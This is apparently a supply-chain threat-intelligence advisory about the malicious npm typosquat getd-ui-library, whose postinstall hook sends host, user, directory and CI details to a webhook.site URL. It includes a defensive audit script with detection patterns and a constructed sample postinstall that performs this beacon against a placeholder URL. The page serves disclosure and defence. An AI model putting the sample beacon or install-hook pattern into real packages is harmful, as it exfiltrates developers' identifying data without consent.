THREATPKG

Supply-chain threat intelligence


critical · npm · malware · osv

Malicious code in getd-ui-library (npm)

getd-ui-library

Risk score

92

AI summary

Indexed incident for getd-ui-library (npm).

Description

On npm install, postinstall.js runs unconditionally (scripts.postinstall = 'node postinstall.js') and sends an HTTPS GET to a hardcoded webhook.site URL carrying the installer's hostname (os.hostname()), username (os.userInfo().username), platform (os.platform()), current working directory (process.cwd()), and CI-detection environment variables (CI, BUILD_BUILDID, AGENT_NAME) as query parameters. webhook.site is an anonymous request-capture service — whoever holds the UUID receives identifying telemetry from every machine that installs this package, useful for follow-on targeting (CI build agent fingerprinting, developer host enumeration). Errors from the request are swallowed silently. The package additionally occupies the unscoped name getd-ui-library to mimic the legitimate scoped @getd/ui-library package; any developer who mistypes the install name receives this beacon. The package's own README framing this as 'defensive squat' research does not change the installer-side impact: host/user/cwd identifiers leave the machine on every install with no opt-in.
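One way to check a package's install hooks for the telemetry-beacon pattern described here, written as an added example in JavaScript (not ThreatPkg's or the package's own code); the manifest, hook source and webhook URL placeholder are constructed stand-ins:

```javascript
// Added example (not ThreatPkg's or the package's own code): audit an npm
// package's install-lifecycle scripts for the beacon shape described above.
// The manifest and postinstall source below are constructed stand-ins.
const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Host-identity reads and network sinks named in the incident description.
const IDENTITY_READS = {
  hostname: /os\.hostname\s*\(/,
  username: /os\.userInfo\s*\(/,
  cwd: /process\.cwd\s*\(/,
  ci_env: /process\.env\.(CI|BUILD_BUILDID|AGENT_NAME)\b/,
};
const NETWORK_CALL = /\b(https?\.(get|request)|fetch)\s*\(/;
const REQUEST_BIN_HOST = /webhook\.site/;
const SWALLOWED_ERROR =
  /\.on\(\s*["']error["']\s*,\s*\(\s*\w*\s*\)\s*=>\s*\{\s*\}\s*\)|catch\s*\(\s*\w*\s*\)\s*\{\s*\}/;

// Lifecycle hooks npm runs automatically on install, taken from the manifest.
function installHooks(manifest) {
  return Object.fromEntries(Object.entries(manifest.scripts || {})
    .filter(([name]) => LIFECYCLE_HOOKS.includes(name)));
}

// Identity reads combined with an outbound request is the beacon shape;
// a request-bin host and silenced errors are corroborating findings.
function auditHookSource(src) {
  const reads = Object.keys(IDENTITY_READS).filter((k) => IDENTITY_READS[k].test(src));
  const findings = [];
  if (reads.length) findings.push(`reads host identity: ${reads.join(", ")}`);
  if (NETWORK_CALL.test(src)) findings.push("makes an outbound request");
  if (REQUEST_BIN_HOST.test(src)) findings.push("targets a request-capture service");
  if (SWALLOWED_ERROR.test(src)) findings.push("swallows request errors");
  return { beacon: reads.length > 0 && NETWORK_CALL.test(src), findings };
}

// Audit every install hook; sourcesByHook maps hook name to its script text.
function auditPackage(manifest, sourcesByHook) {
  return Object.entries(installHooks(manifest)).map(([hook, cmd]) =>
    ({ hook, cmd, ...auditHookSource(sourcesByHook[hook] || "") }));
}

// Constructed sample mirroring the description (placeholder URL, not the real one).
const SAMPLE_MANIFEST = { name: "getd-ui-library", version: "0.0.1",
  scripts: { postinstall: "node postinstall.js" } };
const SAMPLE_POSTINSTALL = `
const https = require("https"), os = require("os");
const q = new URLSearchParams({ h: os.hostname(), u: os.userInfo().username,
  p: os.platform(), d: process.cwd(), ci: process.env.CI || "" }).toString();
https.get("https://webhook.site/<uuid-placeholder>/?" + q).on("error", () => {});`;
console.log(JSON.stringify(auditPackage(SAMPLE_MANIFEST, { postinstall: SAMPLE_POSTINSTALL })));
```

Running the same audit over every package.json under node_modules (or in CI, with `npm install --ignore-scripts` as the default) turns the described beacon into a blocking finding rather than a post-hoc discovery.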

Technical details

Affected versions

= 0.0.1

Indicators

  • affected version = 0.0.1 (75%)

Timeline

  1. Advisory published
  2. Indexed by ThreatPkg

Related incidents